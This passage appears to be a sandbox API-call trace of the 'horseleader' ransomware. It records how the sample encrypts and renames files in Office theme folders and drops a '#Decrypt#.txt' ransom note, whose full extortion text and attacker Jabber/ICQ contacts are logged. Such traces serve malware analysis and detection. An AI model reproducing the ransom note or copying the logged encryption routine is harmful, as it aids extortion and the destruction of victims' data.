Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 80 [0245.996] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0245.996] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0245.996] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0245.997] lstrlenW (lpString=".testttjffg") returned 11 [0245.997] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0245.997] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0245.997] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0245.997] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0245.998] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 80 [0245.998] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0245.998] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1569) returned 1 [0245.998] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x621, lpOverlapped=0x0) returned 1 [0246.001] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff9df, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.001] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x621, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x621, lpOverlapped=0x0) returned 1 [0246.001] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.001] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.001] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.001] CloseHandle (hObject=0x1a4) returned 1 [0246.002] GetProcessHeap () returned 0x780000 [0246.002] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.002] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF.horseleader") returned 92 [0246.002] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\preview.gif.horseleader")) returned 1 [0246.003] GetProcessHeap () returned 0x780000 [0246.003] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.003] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86e63000, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x86e63000, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x6292, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.003] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.003] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 81 [0246.003] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.003] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.003] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.003] lstrlenW (lpString=".testttjffg") returned 11 [0246.004] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.004] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.004] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.004] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.005] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 81 [0246.005] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.006] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=25234) returned 1 [0246.006] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.009] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.010] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.010] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1292, lpOverlapped=0x0) returned 1 [0246.010] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffed6e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.010] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1292, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1292, lpOverlapped=0x0) returned 1 [0246.011] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.011] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.011] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.011] CloseHandle (hObject=0x1a4) returned 1 [0246.011] GetProcessHeap () returned 0x780000 [0246.011] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.011] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG.horseleader") returned 93 [0246.012] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png.horseleader")) returned 1 [0246.013] GetProcessHeap () returned 0x780000 [0246.013] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.013] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86e63000, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x86e63000, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x6292, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.013] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.013] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\#Decrypt#.txt") returned 82 [0246.013] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.014] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0246.014] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.015] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0246.015] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.015] CloseHandle (hObject=0x158) returned 1 [0246.015] GetProcessHeap () returned 0x780000 [0246.015] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.015] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ARCTIC", cAlternateFileName="")) returned 1 [0246.015] lstrcmpiW (lpString1="ARCTIC", lpString2="Windows") returned -1 [0246.015] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC") returned 66 [0246.015] lstrcmpW (lpString1="ARCTIC", lpString2=".") returned 1 [0246.015] lstrcmpW (lpString1="ARCTIC", lpString2="..") returned 1 [0246.016] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.016] GetProcessHeap () returned 0x780000 [0246.016] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.016] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\*") returned 68 [0246.016] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.017] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.017] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\.") returned 68 [0246.017] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.017] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.018] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.018] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\..") returned 69 [0246.018] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0246.018] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.018] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc081900, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x5146e3d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdc081900, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x10fc7, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="ARCTIC.ELM", cAlternateFileName="")) returned 1 [0246.018] lstrcmpiW (lpString1="ARCTIC.ELM", lpString2="Windows") returned -1 [0246.018] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM") returned 77 [0246.018] StrStrIW (lpFirst="ARCTIC.ELM", lpSrch=".horseleader") returned 0x0 [0246.018] lstrcmpW (lpString1="ARCTIC.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.018] lstrcmpW (lpString1="ARCTIC.ELM", lpString2="_uninstalling_.png") returned 1 [0246.018] lstrlenW (lpString=".testttjffg") returned 11 [0246.018] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM", lpSrch=".testttjffg") returned 0x0 [0246.018] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.018] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.018] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\arctic.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.020] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM") returned 77 [0246.020] StrStrW (lpFirst="ARCTIC.ELM", lpSrch=".txt") returned 0x0 [0246.020] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=69575) returned 1 [0246.020] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.020] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.035] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.035] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.036] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x5fe3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.036] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.036] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.036] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.037] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xbfc7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.037] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.037] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.037] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.038] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.038] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.039] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.039] CloseHandle (hObject=0x1a4) returned 1 [0246.039] GetProcessHeap () returned 0x780000 [0246.040] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.040] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM.horseleader") returned 89 [0246.040] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\arctic.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\arctic.elm.horseleader")) returned 1 [0246.041] GetProcessHeap () returned 0x780000 [0246.041] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.041] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a79b700, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x5146e3d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8a79b700, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x201, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="ARCTIC.INF", cAlternateFileName="")) returned 1 [0246.041] lstrcmpiW (lpString1="ARCTIC.INF", lpString2="Windows") returned -1 [0246.042] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.INF") returned 77 [0246.042] StrStrIW (lpFirst="ARCTIC.INF", lpSrch=".horseleader") returned 0x0 [0246.042] 